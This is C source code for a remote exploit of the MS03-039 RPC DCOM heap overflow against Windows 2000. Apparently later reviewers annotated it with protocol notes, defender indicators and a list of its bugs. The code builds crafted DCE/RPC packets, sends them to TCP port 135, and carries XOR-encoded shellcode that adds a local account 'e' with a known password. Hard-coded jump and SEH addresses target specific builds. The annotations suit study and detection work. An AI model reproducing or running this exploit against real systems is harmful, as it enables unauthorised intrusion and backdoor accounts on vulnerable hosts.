
  6. <BODY><PRE>#include <stdio.h>
  7. #include <stdlib.h>
  8. #include <sys/types.h>
  9. #include <sys/socket.h>
  10. #include <netinet/in.h>
  11. #include <arpa/inet.h>
  12. #include <unistd.h>
  13. #include <netdb.h>
  14. #include <fcntl.h>
  15. #include <unistd.h>
  16.  
  17. /* xfocus start */
  18.  
/*
 * First packet main() sends after connecting (72 bytes, sent unchanged;
 * the reply is read into buf1 but never parsed).
 *
 * NOTE(review): the leading bytes 05 00 0B read as a DCE/RPC v5.0 header
 * with ptype 0x0B (bind), and the 16-bit value at offset 8 (0x0048 == 72)
 * equals sizeof(bindstr), which is consistent with a fragment-length field.
 * Confirm against the protocol specification before relying on this.
 */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  29.  
/*
 * Body of the second packet. main() copies it to the start of buf2 and then
 * adds sizeof(sc)-0xc to the 32-bit values at buf2 offsets 8, 0x10, 0x80,
 * 0x84, 0xb4, 0xb8, 0xd0 and 0x18c. Those offsets are hard-coded to this
 * exact byte layout, so the array cannot be edited without revisiting them.
 *
 * NOTE(review): the leading bytes 05 00 00 03 read as a DCE/RPC v5.0 header
 * with ptype 0 (request); the 8-byte run 01 10 08 00 CC CC CC CC recurs
 * several times below and again at the start of request4. Confirm against
 * the protocol specification.
 */
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
  139.  
/*
 * 16 bytes placed between request1 and sc in buf2. main() modifies this
 * global in place before copying it: it adds sizeof(sc)/2 to the 32-bit
 * values at offsets 0 and 8 (presumably UTF-16 character counts for the
 * text that follows, since sc is UTF-16LE -- not verifiable from this file).
 * The trailing bytes 5C 00 5C 00 are "\\" in UTF-16LE, i.e. the start of
 * the UNC path that continues in sc.
 */
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
  143.  
/*
 * UTF-16LE text appended directly after sc in buf2 and sent unchanged:
 * "\C$\123456", fifteen '1' characters, ".doc", then a UTF-16 NUL.
 */
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  153.  
//user="e" pass="asd#321"
/*
 * x86 payload that main() copies into sc at sc_offset. Being a string
 * literal, sizeof(sc_add_user) includes the trailing NUL, and that full size
 * is what main() copies and compares against sc_max.
 *
 * The author's comment above describes the effect (creation of a local
 * account); from a responder's side that account is the host-level
 * indicator to check for. NOTE(review): the first 16 bytes disassemble as a
 * short XOR decoder stub (key byte 0x99) over the bytes that follow, so the
 * account name and password are not present in clear text in this array or
 * on the wire -- a content signature would have to key on the stub rather
 * than on the strings. Confirm with a disassembler.
 */
unsigned char sc_add_user[]=
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"
"\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
"\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
"\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
"\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
"\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
"\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
"\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"
"\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"
"\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"
"\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"
"\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"
"\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"
"\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"
"\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC"
"\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8"
"\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA"
"\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED"
"\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99";
/*
 * Layout constants for the sc array; main() uses them as array indices.
 * The two derived macros are unparenthesized, which is harmless for their
 * only uses here (inside [] ), but they should not be used in other
 * arithmetic without parentheses.
 */
#define sc_offset               0x24     /* index in sc where sc_add_user is copied (0x24 == 36) */
#define sc_max                  0x208    /* bound main() checks sizeof(sc_add_user) against */
#define jmp_addr_offset sc_max+sc_offset+0x8   /* index in sc receiving targets[].dwJmpAddr */
#define top_seh_offset  jmp_addr_offset+0x4    /* index in sc receiving targets[].dwTopSeh */
  180.  
/*
 * Template for the long file-name argument named in the program banner.
 * Begins with UTF-16LE "127.0.0.1\IPC$\" (the leading "\\" is the tail of
 * request2), followed by runs of 'E' filler. main() patches three regions
 * of this global in place: sc_add_user at sc_offset, and the selected
 * targets[] entry's dwJmpAddr / dwTopSeh at jmp_addr_offset / top_seh_offset.
 * sizeof(sc) includes the literal's trailing NUL and drives every length
 * adjustment in main().
 *
 * NOTE(review): the 5-byte run e9 f3 fd ff ff reads as an x86 near jmp with
 * a negative displacement -- confirm with a disassembler.
 */
unsigned char sc[]=
"\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00\x2e\x00"
"\x30\x00\x2e\x00\x31\x00\x5c\x00\x49\x00\x50\x00"
"\x43\x00\x24\x00\x5c\x00"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"\xe9\xf3\xfd\xff\xff"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";
  198.  
/*
 * 48-byte trailer appended after request3 in buf2 and sent unchanged.
 * Opens with the same 01 10 08 00 CC CC CC CC run that recurs in request1.
 */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
  207. /* end xfocus */
  208.  
/* Not referenced anywhere in this file (main() uses its local iType). */
int type=0;

/*
 * Per-build address table, indexed by argv[2] in main(). Each entry pairs a
 * 32-bit address with a string naming the module and file version it was
 * taken from (printed as "... in %s" by the usage text), so the entry is
 * only meaningful for hosts running exactly those file versions: Windows
 * 2000 SP4 and SP3+hotfixes, English, with MS03-026 applied. `v` is a spare
 * object of the same anonymous struct type; main() uses sizeof(v) as the
 * element size when computing the table length.
 *
 * NOTE(review): u_long is 8 bytes on LP64 hosts. main() copies only the
 * first 4 bytes of each address field, which yields the intended 32-bit
 * value on a little-endian build; the `%.8x` usage printing is a format
 * mismatch there.
 */
struct
{
        char    *os;          /* human-readable target description */
        u_long   dwTopSeh;    /* copied into sc at top_seh_offset by main() */
        char    *seh;         /* module/version dwTopSeh was taken from */
        u_long   dwJmpAddr;   /* copied into sc at jmp_addr_offset by main() */
        char    *jmp;         /* module/version dwJmpAddr was taken from */
}
targets[] =
{
        { "2kEnSp4+MS03-026",
                0x7c54144c,
                "kernel32.dll v5.0.2195.6688",
                0x77a1b496,
                "OLEAUT32.dll v2.40.4522.0"},
        { "2kEnSp3+SomeHotFixs+MS03-026",
                0x77eda1f0,
                "kernel32.dll v5.0.2195.6079",
                0x77a1afa9,
                "OLEAUT32.dll v2.40.4518.0"}
}, v;
  231.  
  232.  
  233.  
  234.  
/*
 * Program entry point.
 *
 * argv[1]: target host name, resolved with gethostbyname().
 * argv[2]: index into targets[] selecting the hard-coded address pair.
 *
 * Flow: print the banner, validate arguments, patch sc with the selected
 * target's addresses, connect to TCP port 135, send bindstr, read one
 * reply, send the assembled buf2, then report on whether a final recv()
 * returned any data. Returns 0 or 1 on the explicit paths; two error paths
 * fall off with a bare `return;`.
 *
 * Defender notes grounded in this file: the only network activity is one
 * TCP connection to port 135 with two send() calls; the banner states that
 * success adds local user "e", which is the host-level indicator. The
 * addresses in targets[] tie the tool to the two Windows 2000 builds named
 * there; the vendor fix is the bulletin named in the banner (MS03-039).
 *
 * NOTE(review): defects in the archived sample, left unchanged here:
 *  - memcpy() is used but <string.h> is never included (implicit declaration).
 *  - `return;` without a value in an int function, twice.
 *  - the type check uses `>` where the table length is the first invalid
 *    index, so argv[2] equal to the table length reads past targets[].
 *  - `ret` is cast to a pointer and read through without ever being assigned.
 *  - the sc_max length check runs after the memcpy into sc it is meant to guard.
 *  - byte buffers are patched through `unsigned long *` casts: assumes a
 *    4-byte long and tolerates misaligned/aliasing access (undefined behaviour
 *    under the standard).
 *  - `%.8x` is given u_long arguments; `c` and `a` are unused; sockfd is
 *    never close()d (the process exits, so not a practical leak).
 */
int main(int argc,char ** argv)
{
    int len,len1, sockfd, c, a;          /* c and a are never used */
    unsigned long ret;                   /* never assigned; see NOTE above */
    struct sockaddr_in addr_in;          /* sin_zero left uninitialised */
    unsigned short port=135;             /* MS RPC endpoint mapper port */
    unsigned char buf1[0x1000];          /* receive buffer */
    unsigned char buf2[0x1000];          /* assembled second packet */
    int     i, iType;
    struct hostent *he;
    static char *hostname=NULL;

    printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
            "Base on flashsky's MS03-026 exp\n"
            "Code by ey4s<eyas#xfocus.org>\n"
            "Ported to linux by nulluid\n"
            "If success, target will add a user \"e\" and password is \"asd#321\"\n\n");

    if(argc!=3)
    {
        printf("Usage: %s <target> <type>\n", argv[0]);
        /* sizeof(v) is the element size; v is a spare object of the table's anonymous struct type */
        for(i = 0; i < sizeof(targets)/sizeof(v); i++)
            printf( "<%d>   %s\n"
                    "      TopSeh=0x%.8x in %s\n"
                    "      JmpAddr=0x%.8x in %s\n",
                    i, targets[i].os,
                    targets[i].dwTopSeh, targets[i].seh,
                    targets[i].dwJmpAddr, targets[i].jmp);
        return(1);
    }

    iType = atoi(argv[2]);
    /* NOTE(review): off by one -- `>` admits iType equal to the element count */
    if((iType<0) || iType > sizeof(targets)/sizeof(v))
    {
        printf("[-] Wrong type.\n");
        return;                          /* no value returned from int main */
    }

    hostname = argv[1];

    /* Dead check: hostname was just assigned from argv[1], and no -d option exists. */
    if(hostname==NULL)
    {
        printf("[-] Please enter a hostname with -d\n");
        exit(1);
    }

    printf("RPC DCOM remote exploit - .:[rootzero.net]:. - nulluid\n");
    printf("[+] Resolving host..\n");

    if((he = gethostbyname(hostname)) == NULL)
    {
        printf("[-] gethostbyname: Couldnt resolve hostname\n");
        exit(1);
    }

    /* drg */

    /* Patch the global sc in place: the payload bytes at sc_offset, then the
     * two 4-byte addresses from the selected targets[] entry. The sc_max
     * bound on sizeof(sc_add_user) is only checked further down, after this
     * copy has already happened. */
    memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
    memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);
    memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);
    printf("[+] Prepare shellcode completed.\n");

    /* NOTE(review): ret is indeterminate here; casting it to a pointer and
     * reading 4 bytes through it is undefined behaviour. sc+36 is the same
     * location as &sc[sc_offset] (0x24 == 36). */
    memcpy(sc+36, (unsigned char *) ret, 4);

    addr_in.sin_family = AF_INET;
    addr_in.sin_addr = *((struct in_addr *)he->h_addr);
    addr_in.sin_port = htons(port);

    if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("[-] Socket failed");
        return(0);
    }

    if(connect(sockfd,(struct sockaddr *)&addr_in, sizeof(struct sockaddr)) == -1)
    {
        perror("[-] Connect failed");
        return(0);
    }

    printf("[+] Connect to %s:135 success.\n", argv[1]);

    /* Length guard for the memcpy into sc above; it runs too late to prevent
     * that copy from overrunning sc. */
    if(sizeof(sc_add_user) > sc_max)
    {
        printf("[-] shellcode too long, exit.\n");
        return;                          /* no value returned from int main */
    }

    /* xfocus start */
    /* Assemble buf2 = request1 | request2 | sc | request3 | request4, then
     * adjust the embedded 32-bit length/count fields for sizeof(sc). */
    len=sizeof(sc);                      /* overwritten by send() below */
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);

    /* request2 is a global and is modified in place rather than copied first. */
    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;

    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);

    /* Eight 32-bit fields inside the request1 portion of buf2 grow by
     * sizeof(sc)-0xc. The offsets are hard-coded to request1's byte layout. */
    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
    /* end xfocus */

    /* Two round trips: bindstr, reply, buf2, reply. Neither reply is parsed. */
    len=send(sockfd,bindstr,sizeof(bindstr),0);
    if(len<=0)
    {
        perror("[-] Send failed");
        return(1);
    }
    else
        printf("[+] send %d bytes.\n", len);

    len=recv(sockfd, buf1, 1000, 0);
    if(len<=0)
    {
        printf("[-] recv error\n");
        return(1);
    }
    else
        printf("[+] recv %d bytes.\n", len);

    len = send(sockfd,buf2,len1,0);
    if(len<=0)
    {
        printf("[-] Send failed.\n");
        return(1);
    }
    else
        printf("[+] send %d bytes.\n", len);

    /* Outcome is a heuristic only: no data or a closed connection is reported
     * as possible success, any returned data as failure. */
    len=recv(sockfd,buf1,1024,0);
    if(len<=0)
    {
        printf("[+] Target crash or exploit success? :)\n");
    }
    else
        printf("[-] recv %d bytes. Bad luck!\n", len);

    return(0);

}
  410.  
  411.  
  412.  
  413.  